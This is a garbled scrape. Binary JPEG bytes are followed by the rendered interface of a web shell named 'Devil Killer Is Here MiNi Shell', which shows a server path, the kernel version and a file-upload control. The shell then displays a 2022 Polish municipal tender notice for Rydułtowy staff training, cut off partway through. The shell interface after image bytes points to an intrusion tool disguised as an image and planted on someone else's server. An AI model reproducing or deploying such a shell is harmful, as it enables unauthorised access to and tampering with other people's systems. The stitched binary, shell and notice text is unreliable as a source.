JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220421/0012955901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> przeprowadzenie usług szkoleniowych dla pracowników Urzędu Miasta Rydułtowy oraz miejskich jednostek organizacyjnych projektu: &#34;W cieniu Szarloty - jak wydobyć potencjał miasta Rydułtowy&#34;. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Rydułtowy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258635</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ofiar Terroru 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rydułtowy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-280</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">324537411</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">324537410</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@rydultowy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rydultowy.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> przeprowadzenie usług szkoleniowych dla pracowników Urzędu Miasta Rydułtowy oraz miejskich jednostek organizacyjnych projektu: &#34;W cieniu Szarloty - jak wydobyć potencjał miasta Rydułtowy&#34;. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8135572a-c091-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00129559</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00015788/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.20 Przeprowadzenie usług szkoleniowych dla pracowników UM Rydułtowy oraz miejskich jednostek organizacyjnych realizowanego w ramach projektu &#34;W cieniu Szarloty - jak wydobyć potencjał miasta Rydułtowy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „W cieniu Szarloty – jak wydobyć potencjał miasta Rydułtowy” finansowanego ze środków Mechanizmu Finansowego EOG 2014-2021 realizowanego w ramach programu „Rozwój Lokalny”. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/rydultowy <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/rydultowy</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. <br/> 2. Komunikacja w postępowaniu odbywa się elektronicznie za pośrednictwem platformy (portalu) https://platformazakupowa.pl/pn/rydultowy i formularza &#34;Wyślij wiadomość&#34;. W korespondencji należy posługiwać się znakiem sprawy względnie ID postępowania.<br/> 3. Korzystanie z serwisu (platformy) wymaga zapoznania się Regulaminem dla Użytkowników (Wykonawców) dostępnego na portal_ https://platformazakupowa.pl/pn/rydultowy.<br/> 4. Minimalne wymagania techniczne umożliwiające korzystanie ze strony platformazakupowa.pl to przeglądarka internetowa Internet Explorer, Chrome i FireFox w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki typu „cookies” oraz łącze internetowe o przepustowości, co najmniej 256 kbit/s. platformazakupowa.pl jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli. Szyfrowanie danych odbywa się przy pomocy protokołu SSL.<br/> 5. Kodowanie i czas:  Plik załączony i zapisany przez Wykonawcę na platformie nie jest widoczny dla Zamawiającego, gdyż jest przechowywany na osobnym szyfrującym serwerze i zaszyfrowany. Możliwość pobrania plików przez Zamawiającego następuje po upłynięciu terminu otwarcia ofert oraz ich odszyfrowaniu w systemie.  Oznaczenie czasu odbioru danych przez platformę stanowi przypiętą do oferty elektronicznej datę oraz dokładny czas (hh:mm:ss), znajdujące się w kolumnie dotyczącej danej oferty, w sekcji - &#34;Data złożenia oferty&#34;. 6. Komunikacja przez &#34;Wyślij wiadomość&#34; umożliwia dodanie do treści wysyłanej wiadomości plików lub spakowanego katalogu (załączników). Występuje limit objętości plików lub spakowanego katalogu w zakresie całej wiadomości do 1 GB przy maksymalnej ilości 20 plików lub spakowanych katalogów. Zamawiający, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/> 1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/> 2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/> 3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/> 4) włączona obsługa JavaScript,<br/> 5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/> 6) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/> 7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. Ofertę składa się pod rygorem nieważności, w formie elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Szczegółowy opis został zawarty w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 RODO informuję, że: 1) administratorem danych osobowych jest: Burmistrz Miasta Rydułtowy z siedzibą w urzędzie miasta przy ul. Ofiar Terroru 36, 44-280 Rydułtowy, tel.: (032) 4537411, faks: (032) 4537410, e-mail: um@rydultowy.pl, adres internetowy: www.rydultowy.pl, 2) inspektor ochrony danych jest dostępny pod numerem (032 4537480) oraz pod adresem e-mailowym iod@rydultowy.pl,3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym na realizację przedsięwzięcia usług szkoleniowych dla pracowników Urzędu Miasta Rydułtowy oraz miejskich jednostek organizacyjnych. 4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ust. 1 oraz art. 74 ust.1 ustawy Pzp,5) Pani/Pana dane osobowe będą przechowywane zgodnie z okresem archiwizacji przewidzianym dla projektów współfinansowanych ze środków Mechanizmu Finansowego EOG 2014-2021. 6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy, 7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; 8) posiada Pani/Pan: a) na podstawie art. 15 rozporządzenia RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; W przypadku gdy wykonanie obowiązków, o których mowa w art.15 ust. 1-3 rozporządzenia RODO, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub postępowania o udzielenie zamówienia publicznego, b) na podstawie art. 16 rozporządzenia RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą umowy w zakresie niezgodnym z Pzp oraz nie może naruszać integralności protokołu oraz jego załączników, c) na podstawie art. 18 rozporządzenia RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowaw art. 18 ust. 2 rozrządzenia RODO;Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego, W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia RODO, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia RODO. Udostępnianie, o którym mowa powyżej, ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 rozporządzenia RODO, zebranych w toku postępowania o udzielenie zamówienia. Ograniczenia zasady jawności, o których mowa w ust. 3 i art. 18 ust. 3-6, stosuje się odpowiednio, d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy rozporządzenia RODO; 9nieprzysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e rozporządzenia RODO prawo do usunięcia danych osobowych; b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia RODO, c) na podstawie art. 21 rozporządzenia RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">RODO (ograniczenia stosowania): Skorzystanie przez osobę, której dane osobowe dotyczą, z<br/>uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia ani zmianą postanowień<br/>umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BP.271.000010.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I: Dostępność informacyjno-komunikacyjna – szkolenie z Polskiego Języka Migowego<br/>1) Uczestnikami szkolenia będzie 13 pracowników stanowisk obsługi klienta w Urzędzie<br/>Miasta Rydułtowy oraz miejskich jednostkach organizacyjnych.<br/>2) Dla 13 uczestników szkolenia zostanie przeprowadzony kurs na poziomie podstawowym<br/>A1.<br/>3) Po zakończeniu szkolenia na poziomie podstawowym A1 dla 3 pracowników<br/>zorganizowany zostanie kurs na poziomie podstawowym A2.<br/>4) Program zajęć powinien być zgodny z wymogami dla uzyskania certyfikatu na poziomie<br/>podstawowym A1 oraz A2.<br/>5) Zajęcia muszą odbywać się w formie teoretycznej jak i praktycznej.<br/>6) Dla kursu na poziomie podstawowym A1 Zamawiający dopuszcza przeprowadzenie kursu<br/>w systemie mieszanym – wykłady teoretyczne w formule online, zajęcia praktyczne<br/>w trybie stacjonarnym. Dla kursu na poziomie podstawowym A2 Zamawiający dopuszcza<br/>przeprowadzenie kursu w formule online.<br/>7) Zamawiający zapewni uczestnikom kursu sprzęt komputerowy umożliwiający udział<br/>w szkoleniu w formule online.<br/>8) Zamawiający nie posiada płatnej licencji oprogramowania do przeprowadzania<br/>szkoleń/wideokonferencji.<br/>9) Zajęcia praktyczne w systemie stacjonarnym przeprowadzone zostaną w lokalu<br/>nieodpłatnie udostępnionym przez Zamawiającego na terenie miasta Rydułtowy.<br/>10)Zamawiający zapewni wodę oraz ciepłe napoje (kawa, herbata) podczas szkolenia w formie<br/>stacjonarnej.<br/>11)Szkolenie powinno trwać co najmniej 30 godzin dydaktycznych dla uczestników kursu na<br/>poziomie podstawowym A1 oraz co najmniej 60 godzin dydaktycznych dla uczestników<br/>kursu na poziomie podstawowym A2.<br/>12)Zamawiający dopuszcza przeprowadzenie bloku zajęć, po kilka godzin dydaktycznych<br/>w ciągu jednego dnia.<br/>13)Wykonawca zapewni uczestnikom szkolenia wszelkie niezbędne materiały dydaktyczne,<br/>które przechodzą na własność uczestnika kursu. <br/>14)Szkolenie zakończy się egzaminem przeprowadzonym na koszt Wykonawcy przez<br/>Instytucję Certyfikującą lub Wykonawca zapewni wydanie uczestnikowi kursu certyfikatu<br/>lub innego dokumentu rozpoznawalnego i uznawanego w środowisku, sektorze lub branży,<br/>poświadczającego udział w szkoleniu i potwierdzającego uzyskane kwalifikacje<br/>i uprawnienia uznawane w krajach Unii Europejskie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80511000-9 - Usługi szkolenia personelu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II: Dostępność informacyjno-komunikacyjna – szkolenie z języka prostego<br/>1) Szkolenie adresowane jest do pracowników Urzędu Miasta Rydułtowy oraz miejskich<br/>jednostek organizacyjnych.<br/>2) Program szkolenia powinien zostać dostosowany do potrzeb pracowników administracji<br/>samorządowej.<br/>3) Wykonawca przeprowadzi dwudniowe szkolenie w formule online dla 6 grup po 20<br/>uczestników.<br/>4) Szkolenie dla jednej grupy kursantów powinno trwać co najmniej 4 godziny zegarowe<br/>jednego dnia, sumarycznie 8 godzin zegarowych dla jednej grupy, łącznie 48 godzin dla<br/>wszystkich grup. <br/>5) Wykonawca zapewni uczestnikom szkolenia wszelkie niezbędne materiały dydaktyczne,<br/>które przechodzą na własność uczestnika kursu.<br/>6<br/>6) Zamawiający zapewni uczestnikom kursu sprzęt komputerowy umożliwiający udział<br/>w szkoleniu.<br/>7) Zamawiający nie posiada płatnej licencji oprogramowania do przeprowadzania<br/>szkoleń/wideokonferencji.<br/>8) Zajęcia muszą odbywać się w formie teoretycznej jak i praktycznej. <br/>9) Po zakończeniu szkolenia uczestnicy otrzymają imienny certyfikat potwierdzający<br/>uczestnictwo w szkoleniu.<br/>10)Minimalny zakres szkolenia:<br/>a) Podstawowe informacje o języku prostym w administracji,<br/>b) Zasady redagowania pism urzędowych prostym językiem,<br/>c) Graficzne przedstawienie tekstu pisma urzędowego oraz jego zgodność z zasadami dostępności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80511000-9 - Usługi szkolenia personelu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III: Dostępność informacyjno-komunikacyjna – szkolenie z obsługi osób<br/>z niepełnosprawnościami<br/>1) Uczestnikami szkolenia będzie 30 pracowników stanowisk obsługi klienta w Urzędzie<br/>Miasta Rydułtowy oraz miejskich jednostek organizacyjnych.<br/>2) Zamawiający dopuszcza 